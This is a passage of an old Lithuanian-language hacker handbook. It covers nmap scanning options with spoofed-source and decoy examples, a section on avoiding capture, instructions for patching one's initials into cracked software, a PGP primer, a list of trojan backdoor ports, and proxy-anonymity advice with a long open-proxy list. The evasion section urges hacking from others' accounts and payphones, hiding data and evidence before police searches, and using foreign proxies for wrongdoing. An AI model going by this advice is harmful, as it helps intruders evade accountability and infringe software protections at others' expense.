Kartais nmap’as gali nerasti jūsų adreso. Tokiu atveju galite naudoti -S opciją su jūsų IP adresu bei interfeisu, kuriuo siūsite paketus.

-e

Nurodo nmap’ui kokiu interfeisu siųsti paketus.

(lo, ppp0, eth0 ir etc.)

-g

Nurodo iš kokio porto skanuoti. Daugelis firewall’ų bei filtrų padaro išimtis DNS (53) bei FTP-DATA

(20) paketams.

-r Nurodo nmap’ui portus skanuoti NE atsitiktine tvarka.

-M

Nustato naksimalų susijungimu skaičių, kuris bus naudojamas paralelėje su TCP(standartiškai) skanav­

imu.

LAIKO APRIBOJIMAI

-T

Paranoid – pats lėčiausias skanavimo būdas, Insane

– pats greičiausias, deja ne toks tikslus, ypač jei tinklas lėtas. Vietoj žodžių galite naudoti ir -T

(0-5), kur 0 == Paranoid, 1 == Sneaky ir t.t.

–host_timeout

Nurodo kiek laiko nmap’as gali skanuoti duotąjį IP.

Laikas turi būti nemažiau nei 200 milisekundžių.

–max_rtt_timeout

Kiek daugiausia laiko nmap’as gali laukti atsakymo iš skanuojamo IP.

–scan_delay

Nustato minimalų laiko tarpą, kuri nmap’as turi laukti tarp bandymų. Tai naudingiausia siekiant sumažinti tinklo apkrovimą.

TAIKINIO NURODYMO BŪDAI

Viskas, kas nėra opcijos, nmap’e suprantama kaip taikinys.

Paprasčiausias būdas yra nurodyti konkrečius IP arba hos­

tus. Jeigu norite nuskanuoti IP adresų subnet’ą, galite pridėti /maskę hostname’ui ar IP adresui. Maskė turi būti tarp 0 (norint nuskanuoti visą internetą) ir 32 (norint nuskanuoti konkretų host’ą/IP. Naudok /24 ‘C’ klasės adresų skanavimui bei /16 ‘B’ klasės adresų skanavimui.

nmap’as taip pat turi gan patogią galimybę nustatinėti IP

adresus sąrašais/atstumais. pvz. gali nuskanuoti ‘B’ klasę užrašydamas 128.210.*.* arba 128.210.0-255.0-255 arba dar

128.210.0-50,51-255.1,2,3,4,5-255 . Manau kad tai pakanka­

mai patogu ir nesudėtinga.

KELETAS PAVYZDŽIŲ

nmap -sX -e lo -P0 -S 127.0.0.3 localhost

Pasinaudodamas Xmas Tree skanavimo metodu, apsimetinėdamas, kad esu 127.0.0.3 Loopback protokolu skanuoju savo localhost’ą Štai kaip atrodo ipchains’ų log’as:

Packet log: input DENY lo PROTO=6 127.0.0.3:37009

127.0.0.1:139 L=40 S=0x00 I=53682 F=0x0000 T=41 (#1)

kaip matote, kernelis yra įsitikinęs, kad jį skanuoja iš

127.0.0.3 o tai ir yra vienas svarbiausių uždavinių –

likti nematomiems 🙂

nmap -sS -O target.example.com/24

stealth SYN metodu nuskanuoja visas 255 mašinas, esančias target.example.com ‘C’ klasėje. Taip pat bando nustatyti kiekvieno iš jų operacinę sistemą.

host -l company.com | cut ‘-d ‘ -f 4 | ./nmap -v -iL –

suranda visus *.company.com hostus ir atiduoda juos nmap’ui, kuris savo ruožtu įsijungęs verbose mode visus juos nuskanuoja.

nmap -sN -D microsoft.com,mail.takas.lt,ME -oN /tmp/crazy

-p 1-1024 -O crazy.com

skanauoja Null skanavimo režimu, panaudoja du decoy adresus, viską logina į /tmp/crazy failą, skanuoja nuo 1

iki 1024 crazy.com portus bei stengiasi atspėti crazy.com serverio operacinę sistemą

BUGAI

Vabalėliai? Kokie dar vabalėliai? Na.. jei rasit kokių, būtinai siūskit autoriui: . Pachai taip pat labai laukiami. Taip pat nepamirškite siūsti OS’ų fingerprintus, kad nmap’o autoriai galėtų plėsti duom.

bazę. Apie tai smulkiau galite rasti docs/nmap-finger­

printing-article.txt dokumente arba nmap’o puslapyje:

http://www.insecure.org/nmap

AUTORIUS: Fyodor fyodor@insecure.org

IŠVERTĖ: Aurimas Mikalauskas inner@dammit.lt

PLATINIMAS

Naujausią nmap’o versiją visada galite rasti čia:

http://www.insecure.org/nmap/

nmap is (C) 1997,1998,1999,2000 by Fyodor fyodor@inse­cure.org

libpcap’as yra taip pat platinamas kartu su nmap’u.

Autorines teises į jį turi Van Jacobson, Craig Leres ir

Steven McCanne, visi iš Lawrence Berkeley nacionalinės

Laboratorijos Kalifornijos Universiteto, Berkeley, CA.

Versija platinama su nmap’u gali būti perrašinėjama. Sour­

cus galit parsisiūsti iš ftp://ftp.ee.lbl.gov/libp­cap.tar.Z

PABAIGAI

Džiaugiuosi, kad pagaliau pasiekėte galą. Dabar jau galite skaityti save kvalifikuotu nmap’o guru.

beje, jei norite ką nors pridėti ar pakeisti šiame doku­

mente, arba (neduok Dieve) radot kokių tai bug’u, rašykit man adresu, pateiktu sekcijoje išvertė. Šiaip šitas manu­

alas abejoju ar bus atnaujinamas, bet pačią naujausią nmap-lt-HOWTO visada galite rasti mano puslapyje:

http://ice.dammit.lt/~inner/

37. Paranoja arba kaip neikliuti

Prie ko cia ta paranoja? As zinau kas yra exploitas etc ir as galiu hakinti viska kas hakinasi. Neaaaaaaa. Su tokiu poziuriu toli nenueisi. Matai, px tie exploitai etc jei tave seka (klausosi telefono pokalbiu, skaito email etc), jei tavo kompas konfiskuotas arba netgi pats suimtas.

Svarbiausia hakeriui ne zinoti daug exploitu etc, o buti nepagautam. Nes jei jau tave pagavo, tai tave gali ismesti is universiteto/darbo/mokyklos. Jei jau karta ikliuvai kaip hakeris, tai ir liksi su ta zyme likusi gyvenima. Ir kas svarbiausia: TU esi kaltas tol, kol kasnors neirodo priesingai. Adminui, kaip ir tau yra px istatymai (jis skiresi nuo taves tik tuo kad jo valdzioje yra servas), jei jis jau itare tave: skaitys tavo email, stebes tavo failus etc.

-=Taigi pateiksiu keleta metodu kaip neikliuti:=-

1. Visa mail`a sifruok PGP (jei nezinai kas tai tai suzinok).

2. Visus savo failus sifruok.

3. Laikyk visokius popierius (uzrasus etc) tol kol tikrai tau ju reikia. Visa kas nereikalinga sunaikink (sudegink etc, tik ne mesk i siuksline. Del ko? Skaityk apie trashinga).

4. Visus duomenis nusikopijuok (ir uzsifruok) i kita laikmena (CD, ZIP, Hard`a etc). Laikyk juos kurnors kas nesusije su tavimi, hackingu. Taip neprarasi kratos metu savo duomenu ir siaip bus geras BackUP`as.

5. Narsydamas www islik anoniminis. Kaip tai padaryti? Skaityk straipsni Proxy serveriai.

6. Nehakink is savo linijos, savo acounto. Naudok svetimus acountus, eik i interneto svetaines (bus sunku arba net neimanoma atsekti), skambink is taksafono.

7. Atskiriems acountams, duomenims naudok vis kitus slaptazodzius. Taip suzinojus viena is ju maziau nukentesi.

Sis sarasas gali vis tesis ir testis. Atmink kad spionazui (taves sekimui) gali buti panaudota, tokia technika, kad net neitari ja esant. Pvz. pagal moniko skeidziamus spindulius galima sekti tavo moniko vaizda daugiau negu 100 m. atstumu, galima lazeriu pagalba sekti stiklo virpejima ir klausytis tavo pokalbiu, paspaudus klavisa isksiriamas tam tikras auksto daznio signalas pagal kuri galima sekti tavo klavisu paspaudimus ir daug daug kitu metodu.

Ka daryti jei jau esi itariamas? Net ir durniui aisku kad daba tave seks. Tad protingiausiai nusiraminti kol viskas praeis. Nesidometi hakingu, ispeti draugus kad nerasytu jokiu itartinu mail`u (PGP sifruota zinute taip pat kelia itarima), nesneketu apie nelegalia veikla telefonu. Taip pat reikia tiketis kratos, tad visa nelegale info, softa pasalink is savo buto/kompo. Ka veik si laika? Zaisk zaidimus, skaityk, tobulink savo programavimo igudzius etc.

-=Na o ka daryt ikliuvus?=-

1. Tuoj pat kreipkis i advokata. Jis turi pasistengti kad nebutu atliekama krata. Tai nedaug ka pades, bet sumazins ikalciu skaiciu, pasunkins teisesaugai tyrima etc. Parodyk, kad lengvai nepasiduosi.

2. Nekalbek su mentais. Jei gali pasakyti bet ka, kad tu viska ispasakotum. Pvz.: kad paleis jei viska papasakosi. Taip nebuna, jei negali to padaryti. Tai gali tik prokuroras. Nieko mentams nepasakok, sakyk kad kalbi tik per advokata etc. Pats be kalbedamas gali netycia „susivartyti”, prasitarti etc.

3. Tarkis su advokatu, kaip islipti is sito meslo.

Beto: neisduok savo darugu, kitu hakeriu etc. Visu pirma tu busi ozys, antra- gali prisidirbti dar daugiau (tu mani jei potos isdavystes apie tave nieko pasakyt nenores/negales).

Isvada:

-=NEIKLIUK, NEIKLIUK, NELEISK NET KAD TAVE ITARTU!!! TAPK PARANOJIKU!!! NEUZMIRS NIEKO KA CIA PERSKAITEI!!=-

38. Kaip Palikti Inicialus Nulauzhtoje Programoje

Jeigu jums sunku skaityti, tai yra reikia smaukty scrol bara apachioje(atiprashau uzh ishsireishkima:)) bet tinkamesnio zhodzhio nerada:) tada paspauskite EDIT ir isijunkite WORD WRAP

aha na ir ka chia dabar jums pasakius, o gi tai kad manau kas bent kiek yra crackines (tikiuosi sekmingai:))) ir jei jam tai pavykdavo o jei dar ne, tai tikrai pavyks:) , tai vat vienu zhodzhiu kai nukrakini progse tai apima tarsi palaimos jausmas, tarsi pasidydzhiavimas, kad vat ash ja iveikiau, ash apejau ta prakeikta apsaugos sistema:) kuri ribojo mano veiksmus, taigi kaip parodyti kad butent tu nukrakinai ta ar kita progse, kitaip sakant kaip joje palikti inicialus, juk ir mes jau prie jos truputi prisidejome:)) argi ne?? o butu ish viso puiku jei tavo darba kazhkas prisiimtu sau. taigi viskas ko jums reikes tai papraschiausio hex editoriaus, na ash naudoju HIEW (visu papraschiausias naudojimui ish tu kuriuos ishbandzhiau ir manau geriausias:)) bet tai mano smeninis pozhiuris) taigi o kitas dalykas ko mums reikes tai papraschiausios hexines abeceles, na ash ja taip vadinu:

a-61 A-41 / – 2F Space – 00 or 20

b-62 B-42 – 5C

c-63 C-43 . – 2E

d-64 D-44 – – 2D

e-65 E-45 : – 3A

f-66 F-46 = – 3D

g-67 G-47 ? – 3F

h-68 H-48 ! – 21

i-69 I-49 ” – 22

j-6A J-4A $ – 24

k-6B K-4B % – 25

l-6C L-4C & – 26

m-6D M-4D ( – 28

n-6E N-4E ) – 29

o-6F O-4F 1 – 31

p-70 P-50 2 – 32

q-71 Q-51 3 – 33

r-72 R-52 4 – 34

s-73 S-53 5 – 35

t-74 T-54 6 – 36

u-75 U-55 7 – 37

v-76 V-56 8 – 38

w-77 W-57 9 – 39

x-78 X-58 0 – 30

y-79 Y-59 + – 2B

z-7A Z-5A * – 2A

taigi juk kiekvienoje programoje yra kokie nors zhodzhiai pavyzdzhiu visit our site ar kokiam ABOUT skirsnyje parashyta programos versija ir panashiai taigi atsidarome jau nukrakinta(nebutinai) programa hex editoriumi ir susirandame koki nors zhodi jei naudosite HIEW tai ishpardzhiu paspauskite F7 ir kur parashyta ASCII irashykite ieshkoma fraze , kuria jus noresite pakeisti. ir paspauskite ENTER. na ka kai rasite butent ta vieta kuria jus norite pakeisti neskubekite jos keisti textiniam rezhime, nes nieko jums nepavyks ir programa bus visishkai sugadinta, o juk mes nenorime kad taip atsitiktu:)(ypach jei i ja idejome tiek sunkaus darbo:)) taigi susiradome ta fraze kuria keisime ir tada spaudzhiame F4 ir pasirenkame HEX na jei naudojate kita hex editoriu tai nezhinau kur tai pasirinkti, bet viskas ko jums reikia tai susirasti ta fraze textiniame rezhime ir paskui viska pakeisti i HEXini rezhima. taigi matote kad viena raide tai du skaichiai taigi ir pazhvelkite i ta abcele kuria ash jums daviau kad kiekviena raide sudaryta is dvieju simboliu PVZ:

zona zhodis bus:

7A 6F 6E 61

kur z=7A o=6F n=6E a=61

taigi jusu rasta fraze pakeite i hex rezhima ir keichiame tokiu budu bet nepersistenkite bekeisdami, kadangi jei virshisyte rastos frazes zhodzhiu simbolius bent vienu simboliu PVZ:

jei ash norejau pakeisti LABAS i NELABAS tada programa nebeveiks, na vienu zhodzhiu reikia keisti i tiek pat simboliu PVZ:

jeigu noriu pakeisti fraze :

MAIL to: zona@xxx.lt

taigi gali irashyti savo 19 simboliu, nes tarpas taip pat simbolis, taipogi galiu irashyti ir mazhiau MATOMU simboliu bet likusius turesiu tada uzhrashyti tarpais tai yra 00 arba 20 nes kaip sakau negalima keisti baitu skaichiaus.

PS:nepalikite originalaus kurejo ant ledo:))

nes tai Lamerishka visa garbe prisiimti sau tai ka shiam kartui tiek zhiniu:)

39. Trumpai apie PGP

Kas yra PGP?

PGP (Pretty Good Privacy ) yra vienas geriausiu sifravimo algoritmu, placiai naudojamas sifruojant email`a ir duomenis.

PGP pagristas dvieju raktu- private ir public, autorizacija.

t.y. duomenys sifruojami ir issifruojami dviem raktais, kuriu vienas yra viesas, o kitas privatus. Privatu rakta turi tik informacijos koduotojas ir tas kas ta informacija iskoduos.

Kokioms platformoms skirta PGP?

PGP sifratoriu/desifratoriu yra beveik visoms operacinems sistemoms:

MS-DOS

WINDOWS

UNIX/LINUX

VAX/VMS

BeOS

Windows sistemai populeriausia PGP programa yra WinPGP, bei pasto programa The Bat.

Linux sistemoje naudojama gpg. Email programa palaikanti PGP- mutt

Kur dar pritaikoma PGP?

PGP pritaikoma tikrinti distribuciju legaluma/tikruma.

PVZ. Red Hat rpm paketu originalumas patikrinamas PGP metodu (check PGP signature).

Populiariausiu trojanu portai

Trojano vardas : – Portas –

The tHing 6400

NetBus 1.x 12345

12346

NetBus Pro 20034

BackOriffice 31337

SubSeven 1243

NetSphere 30100

Deep Throat 1,2,3.x 6670

Master Paradise 31

Silencer 1001

Millenium 20000

Devil 1.03 65000

NetMonitor 7306

Streaming Audio Trojan 1170

Socket23 30303

Gatecrasher

Net Control (added 10/05/00)

6969

Telecommando 61466

Gjamer 12076

IcqTrojen 4950

Priotrity 16969

Vodoo 1245

Wincrash 5742

Wincrash2 2583

Netspy 1033

ShockRave 1981

Stealth Spy 555

Pass Ripper 2023

Attack FTP 666

GirlFriend 21554

Fore, Schwindler 50766

Tiny Telnet Server 34324

Kuang 30999

Senna Spy Trojans 11000

WhackJob 23456

Phase0 555

BladeRunner 5400

IcqTrojan 4950

InIkiller 9989

PortalOfDoom 9872

ProgenicTrojan 11223

Prosiak 0.47 22222

RemoteWindowsShutdown 53001

RoboHack 5569

Silencer 1001

Striker 2565

TheSpy 40412

TrojanCow 2001

UglyFtp 23456

WebEx 1001

Backdoor 1999

Phineas 2801

Psyber Streaming Server 1509

Indoctrination 6939

Hackers Paradise 456

Doly Trojan 1011

FTP99CMP 1492

Shiva Burka 1600

Remote Windows Shutdown 53001

BigGluck, aka TN in our archive 34324

NetSpy DK 31339

Hack´99 KeyLogger 12223

iNi-Killer 9989

ICQKiller 7789

Portal of Doom 9875

Firehotcker 5321

Master Paradise 40423

BO jammerkillahV 121

AOLTrojan1.1 30029

Hack’a’tack 31787

The Invasor 2140

SpySender 1807

The Unexplained 29891

Bla 20331

FileNail 4567

ShitHeep 69123

Coma 10607

Bla1.1 1042

HVL Rat5 2283

BackConstruction1.2 5400

Kuang2 theVirus 17300

Xtcp 2.00 + 2.01 5550

Schwindler 1.82 21554

Doly trojan v1.35 1010

Doly trojan v1.5 1015

Wingate (Socks-Proxy) 1080

Vampire 6669

DeltaSource 6883

Trojan Spirit 2001 33911

Maverick’s Matrix 1.2 – 2.0 1269

2025

1025

Total Eclypse 1.0 3791

OOTLT + OOTLT Cart 5011

Eclipse 2000 12701

NetMetro 1.0 5031

Illusion Mailer 5521

InCommand 1.0 + 1.3 + 1.4 07/01/00) 9400

1029

1029

NeTadmin 555

Logged! 20203

Shitheep 6912

Schoolbus 1.6 54321

Schoolbus 2.0

Chupacabra 20203

TheThing 1.6 6000

AimSpy 777

NetMetropolitan 1.04 5032

5031

Transcout 1.1 + 1.2 1999

SoftWar 1207

Ambush 10666

Der Spaeher 3 Insane Network 2000

2001

1000

1001

The Prayer 1.2 + 1.3 9999

2716

Host Control 1.0 6669

11050

Yet Another Trojan 37651

NetRaider 57341

TCPShell.c 6666

PC Crasher 5637

5638

Mini Command 1.2 1050

Mosucker 16484

Rat 1.2 2989

2989

FakeFTP 1966

Intruse Pack 1.27b 30947

Snid X2 3586

7609

1784

Freak 88 7001

Asylium 0.1&0.11&0.12&0.13 23432

Prosiak 44444

23 (telnet option)

Traitor 2.1 SSFS 1.0 21

Connection 60411

Host Control 2.6 10528

11051

15092

7424

7424

BIONET 12349

Rux.PSW 2208

CrazyNet 17490

17500

40. Proxy

Proxy serveriu naudojimas arba anonimiskumas narsant

Kiekviena syki kai jus narsote www, jusu vizitas gali buti loginamas. Viskas: jusu IP, jusu narsykle, OS, ekrano rezoliucija, netgi tai is kur atejote.

Aisku yra grupes zmoniu kuriems tai nepatinka. Taip aisku dazniausiai ir ikliuna ar kitaip prisidirba zmones. Pvz.: kai BTV zurnalistas atskleide zmogzudyste ir apie ja imete i www.btv.lt, VSD (valstybes saugumo departamentas) susirupino, mat ta zmogzudyste buvo valstybine paslaptis ir konfiskavo serva su visais logais, tai yra su visa info kas mate si puslapi. Tai va ar jums patiktu jei viena diena ateitu pas jus kazkas (kad ir VSD) ir vien del to, kad jus apsilankete vienam ar kitam www puslapyje.

Yra keletas budu, kaip nuo to apsisaugoti, kaip likti anonimiskam. Vienas is ju yra moketi bapkes kazkokiom firmom kurios tuo rupinasi (tave anonimizuoja), arba kita- naudoti (kaip jus ir spejate) proxy serverius.

Kaip tai padaryti? O gi sukonfiguruoji savo narsykle ir viskas: Ant Netscape – edit->preferences->advanced->proxy->manual proxy configuration ir spausti View. Atsiradus dialogo lentelei uzrasyti proxy serveri ir porta. Ant Internet Explorer- tools->internet option->conection-> lan setings. Nurodant proxy serveri reike nurodyti ir porta. Dazniausiai naudojami 80 ir 8080 portai.

Taip pat kai kurie download saitai leidzia parsisiusti progses tik, tarkim, USA gyventojams, o jus norite butent parsisiusti progse is to saito. Iseitis: susirandi USA proxy ir ji naudoji.

Kaip rasti proxy serveriu adresus? Galima ieskoti kokiu ju listu arba bandyti paciam speti. Patikrinti ar toks proxy egzistuoja galime taip:

ping proxy.koks-nors-provaideris.net

Jeigu jus gausite atsakyma kaip pvz. „Bad IP”, vadinasi shiame serve proxy nera, bet jeigu pasirodys ICMP echo, ko gero, jus radote tai, ko ieshkojote. Provaideriu sarashus galite gauti darant paieshka ivairiose paieshkos stotyse (yahoo.com, altavista.digital.com, etc.) „ISP list” tema.

Bet is tikro proxy servai anonimiskumo negarantuoja. Jai jus padarysite ka nors blogo, tai auka (arba istatymo sergetojai) gali paprasyti proxy serverio admino, kad duotu jusu ip. Patarimas: jei ka bloga darysit, naudokit kokius kinietiskus ar pan. proxy servus, nes is ju bus sunkiau isgauti info. Beje galima proxy jungti i grandines. Kaip tai padaryt naudojant Netscape? Reikia nueiti edit->preferences->advanced->proxy->manual proxy configuration ir rasyti proxy serverius taip: proxy1.dom:port//proxy2.dom:port//proxy3.dom:port ir pan. Primenu kad kuo daugiau proxy servu naudosit tuo daugiau kris jusu ineto rysys.

Kaip veikia proxy servai?

Tau uzrasius url, adresas perduodamas proxy servui. Jis savo ruoztu nueina ten ir parsiuncia visa puslapi (arba jama is vietinio cashe katalogo), kuri meta tau. Tad is tikro ne tu ateini i norima url, o proxy serveris. Tad loginama proxy servo IP, o ne tavo.

41. Proxy Adresai

Proxy serveriu adresai

Cia pateikiu proxy serveriu adresu (jie, kaip matote, pateikti abeceles tvarka). Pastaba: gali atsitikti taip, kad nurodytas netinkamas proxy serverio portas. Tuomet bandykite visus standartinius proxy portus: 80, 3128, 8080.

-=ARPA – ARPANET=-

227.11.58.209.in-addr.arpa 80

66.216.50.207.in-addr.arpa 80

81.98.178.204.in-addr.arpa 80

82.192.16.12.in-addr.arpa 80

-=AR – ARGENTINA=-

noc.uncu.edu.ar 8080

-=AT – AUSTRIA=-

aphrodite.iaccess.com.au 80

aplan.dnb.com.au 80

core1-s242-2.centris.net.au 80

fewalker.ozemail.com.au 80

firewall.brim.vic.gov.au 80

hutsg7p49.hutch.com.au 80

hutsg9p2.hutch.com.au 8080

jethro.meriden.pas.com.au 80

kalima.ozemail.com.au 80

mail.coolmore.com.au 80

mel.proxy.ozemail.com.au 80

nordex.ozemail.com.au 80

phoenix.bushnet.qld.edu.au 80

203.28.209.34 80

pluto.netlinkwa.com.au 80

202.61.216.2 80

staff.netlinkwa.com.au 80

proxy.hutch.com.au 80

proxy.library.uq.edu.au 80

proxy.primus.com.au 80

sas.netcam.com.au 80

server1.cgs.com.au 80

sydexc2.tmpw.com.au 80

tdone.tudogs.net.au 80

wacka11.wackado.com.au 80

www2.transport.tas.gov.au 80

-=CA – CANADA=-

httpproxy.math.uwaterloo.ca 80

nd253.notredame.sk.ca 80

pc252.ldss.avonmaitland.on.ca 80

pr1.nbed.nb.ca 80

pr2.nbed.nb.ca 80

pr3.nbed.nb.ca 80

pr4.nbed.nb.ca 80

wsd.inet.quill-lake.sk.ca 80

-=CZ – CZECH REPUBLIC=-

bg.pcdir.cz 80

inet01.cabletel.cz 80

-=COM – COMMERCIAL=-

194.72.124.13 80

202.96.134.165 8080

agatlmis01.atl.agcocorp.com 80

anon-sol.free.anonymizer.com 80

asb-hou02.axsia.com 80

bbs.packardbell.com 80

beachboy.kajen.com 8080

berk.com 8080

blaze.syncsort.com 80

cacheflow-1.fwi.com 80

cacheflow-1.fwi.com 8080

cacheflow01.ripnet.com 80

cadworld.com 80

chacal.msage.com 80

d058656.sce.com 80

dym.com 80

eaglent.cemexusa.com 80

eilat.gambit.com 80

filter.burgoyne.com 3128

ftp.sylvania.com 80

gatekeeper.imall.com 80

gateway.hro.com 8080

imsp085.netvigator.com 80

imsp087.netvigator.com 80

inktomi.efortress.com 80

internet-gw1.hea.com 80

invis-ascella.free.anonymizer.com 80

invis-sirrah.free.anonymizer.com 80

ipfilter.hknet.com 80

mail.eg.blommer.com 80

mail.immgmt.com 80

mail.itdynamics.com 80

melnc01.bigpond.com 80

prefetch-atm.nycap.rr.com 8080

proxy-east1.get2net.com 80

proxy01.dbn.iafrica.com 80

proxye3-atm.maine.rr.com 8080

proxye4-atm.maine.rr.com 8080

raistlin.carinthia.co.at 80

sabatini.bestnet.com 80

sgsst.com 80

smtpgw.national-city.com 80

sydnc01.bigpond.com 80

tibinc.com 80

titan.datainternet.com 8080

virtual-domains.flash.net 8080

webcache.us.newbridge.com 80

worf-gw.calspan.com 80

www.intwebservice.com 80

-=DE – GERMANY=-

etecs5.uni-duisburg.de 80

fhdo2.dvz.fh-dortmund.de 80

hdihp2-f.fzk.de 80

nor1s005.jungheinrich.de 80

p3.uhlencom.de 80

3.97.243.195.in-addr.arpa 80

rena.zfn.uni-bremen.de 3128

ultra1b.noc.fh-aachen.de 3128

-=DK – DENMARK=-

linsrv0.staff.kvl.dk 80

-=EDU – EDUCATIONAL=-

bogachiel.evergreen.edu 8080

hawkmoon.northwood.edu 8080

liberty.uc.wlu.edu 80

rhino.evansville.edu 80

vanguard.vg.pdx.edu 80

www.samford.edu 8080

zeus.fiu.edu 8080

-=ES – SPAIN=-

atenea.uax.es 80

-=FI – FINLAND=-

dlc.fi 80

-=FR – FRANCE=-

cache-web.grenet.fr 80

proxycf1.grolier.fr 80

proxycf1.grolier.fr 8080

-=HR – CROATIA=-

gita.srce.hr 80

-=IS – ICELAND=-

nafni.skyggnir.is 80

ns0.ok.is 80

helios.vortex.is 80

-=IT – ITALY=-

dns.lcnet.it 8080

proxy.micanet.it 80

-=JP – JAPAN=-

cairo.osu.ac.jp 8080

cs.oita-med.ac.jp 80

hanshin.koshien-c.ac.jp 80

kpcu.kumamoto-pct.ac.jp 8080

ns.nagano-kentan.ac.jp 8080

ns40c.mis.ous.ac.jp 8080

proxy.baiko.ac.jp 80

sakpro.eiyo.ac.jp 80

sugagw.ci.noda.sut.ac.jp 80

ebisu04.ebisu.ad.jp 8080

denntr01.sunwa.co.jp 8080

dns1.infocom.co.jp 80

dns1.k-sn.co.jp 80

dtsgate.dotshell.co.jp 80

halgw.hallab.co.jp 80

inet-sv.zenon.co.jp 8080

ips-gw.ymdchem.co.jp 8080

nis-in.nara-js.co.jp 80

ns.hayashikk.co.jp 80

ns.matsugc.co.jp 8080

ns.sanshusha.co.jp 80

ns0.apecs.co.jp 8080

www.nidec.co.jp 8080

segw.seng.co.jp 80

sekigate_e.sekitech.co.jp 8080

svtyo04f.nrsgroup.co.jp 80

topgun.polymatech.co.jp 8080

www.housefoods.co.jp 80

www.apel.ne.jp 8080

dns.jicnet.or.jp 8080

kuramoto.miyamizu.or.jp 8080

ns1.shokokai-nagasaki.or.jp 8080

www.health-net.or.jp 8080

www.ink.or.jp 8080

kusu.city.kurume.fukuoka.jp 8080

ns.nousi.pref.okinawa.jp 80

ns.ntts.mihama.chiba.jp 8080

watson.ysp.pref.yamaguchi.jp 8080

apty.rcb.gr.jp 8080

-=KR – KOREA=-

biho.taegu.ac.kr 8080

cache2.kornet.nm.kr 80

cvs2.kyunghee.ac.kr 8080

www.hanilgroup.co.kr 8080

proxy.chungnam.ac.kr 8080

-=LT- LITHUANIJA=-

proxy.5ci.lt 80

proxy.is.lt 80

-=MIL – US Military=-

onion-router.nrl.navy.mil 9200

onion-router.nrl.navy.mil 9200

-=NET – NETWORK=-

205-219-79-148.bayarea.net 8080

alpha1.excell.net 8080

tomato.ulcc.wwwcache.ja.net 8080

beginners.net 80

bos2-wc1.atlas.digex.net 80

bos2-wc2.atlas.digex.net 80

bradpst.bayarea.net 80

bread.mcc.wwwcache.ja.net 8080

cache-1.ftsm.ipa.net 80

cache-1.jopl.ipa.net 80

cache-e0.hom.net 80

cache1.sntc01.pacbell.net 80

cachef.citytel.net 80

cacheflow.bright.net 80

cacheflow.insync.net 80

cacheflow2.mpinet.net 80

cachesrv.1st.net 80

garlic.mcc.wwwcache.ja.net 8080

concord01.pop.internex.net 8080

dca1-wc1.atlas.digex.net 80

dca1-wc1.atlas.digex.net 8080

dca1-wc2.atlas.digex.net 80

dca1-wc2.atlas.digex.net 8080

dead.mcc.wwwcache.ja.net 8080

dynacache.ultra.net 80

elpxy01.ce.mediaone.net 8080

ginger.mcc.wwwcache.ja.ne 8080

hamster.slip.net 8080

holtcompanies.com 80

korma.connect-2.net 80

kraken.telstra.net 3128

lhsa-proxy.shutter.net 80

loxppp6-sp5.suapha.loxinfo.net 80

loxppp67-usr.suapha.loxinfo.net 80

loxppp8-sp10.suapha.loxinfo.net 80

loxusr1.suapha.loxinfo.net 80

magic.brasilnet.net 80

mail.startec.net 80

markpt.hom.net 80

oregano.ulcc.wwwcache.ja.net 8080

munti.i-next.net 80

netcache.apk.net 80

nexus-1.flash.net 8080

nexus-2.flash.net 8080

ns.egyptian.net 8080

ns.htc.net 8080

ns1.isol.net 80

oproxy.cvzoom.net 80

pasco.se.mediaone.net 8080

pepper.mcc.wwwcache.ja.net 8080

pm3-1-user-39.mgv.hom.net 80

polk.se.mediaone.net 8080

proxy.elkgrove.net 80

119.63.170.206.in-addr.arpa 80

cacheflow.golden.net 3000

cacheflow.golden.net 80

proxy.touch.net 80

q.netunlimited.net 80

salt.mcc.wwwcache.ja.net 8080

server1.bisnet.net 80

sjc4-wc1.atlas.digex.net 80

sjc4-wc1.atlas.digex.net 8080

smfcache-1.jps.net 80

sun.hallertau-online.net 80

theseus.mcc.wwwcache.ja.net 8080

virtual-domains.flash.net 8080

waltz.rahul.net 80

-=NL – NETHERLANDS=-

hades.hro.nl 8080

webproxy.gelrevision.nl 80

-=NO – NORWAY=-

alpha1.hnett.no 8080

-=NZ – NEWZEALAND=-

graeme1.iprolink.co.nz 80

www.progress.co.nz 80

-=ORG – ORGANIZATION=-

gw.waaa.org 80

mail.archdiocese-no.org 80

-=PH – PHILIPPINES=-

electron2.msc.net.ph 3128

-=PL – POLAND=-

sunsite.icm.edu.pl 8080

-=PT – PORTUGAL=-

beta.di.uminho.pt 80

leonardo.isec.pt 8080

socks.isec.pt 8080

194.65.52.252 8080

-=QT – QUATAR=-

proxy1.qatar.net.qa 8080

-=RU – RUSSIA=-

adam.rosinkas.ru 80

-=SE – SWEDEN=-

www.sls.se 8080

-=SG – SINGAPORE=-

proxy1.tp.ac.sg 80

inet.gatxterminals.com.sg 8080

-=TH – THAILAND=-

netcache.loxinfo.co.th 80

proxy.rsu.ac.th 8080

swallow.cat.net.th 8080

proxy2.rsu.ac.th 8080

-=TW – TAIWAN=-

c1.h202052106.is.net.tw 80

club.golden.com.tw 8080

server.928.com.tw 3128

www.cisc.iii.org.tw 8080

www.ecs.com.tw 80

-=UK – UNITED KINGDOM=-

horatio.cre.canon.co.uk 8080

softy.poptel.org.uk 8080

ns0.mistral.co.uk 3128

thingy.eng.abdn.ac.uk 80

webcache18a.cache.pol.co.uk 80

webcache18b.cache.pol.co.uk 80

webcache21a.cache.pol.co.uk 80

webcache21b.cache.pol.co.uk 80

webcache22a.cache.pol.co.uk 80

webcache22b.cache.pol.co.uk 80

webcache23a.cache.pol.co.uk 80

webcache23b.cache.pol.co.uk 80

webcache24a.cache.pol.co.uk 80

webcache24b.cache.pol.co.uk 80

webcache25a.cache.pol.co.uk 80

webcache25b.cache.pol.co.uk 80

webcache26a.cache.pol.co.uk 80

webcache26b.cache.pol.co.uk 80

webcachew01a.cache.pol.co.uk 80

webcachew01b.cache.pol.co.uk 80

webcachew02a.cache.pol.co.uk 80

webcachew02b.cache.pol.co.uk 80

webcachew03a.cache.pol.co.uk 80

webcachew03b.cache.pol.co.uk 80

webcachew04a.cache.pol.co.uk 80

webcachew04b.cache.pol.co.uk 80

webcachew05a.cache.pol.co.uk 80

webcachew05b.cache.pol.co.uk 80

webcachew06a.cache.pol.co.uk 80

webcachew06b.cache.pol.co.uk 80

webcachew07a.cache.pol.co.uk 80

webcachew07b.cache.pol.co.uk 80

webcache05b.cache.pol.co.uk 80

webcache06b.cache.pol.co.uk 80

webcache01b.cache.pol.co.uk 80

webcache02b.cache.pol.co.uk 80

webcache04b.cache.pol.co.uk 80

-=US – UNITED STATES=-

cache.manistee-isd.k12.mi.us 81

ci.blue-springs.mo.us 80

dcs.dexter.k12.mi.us 80

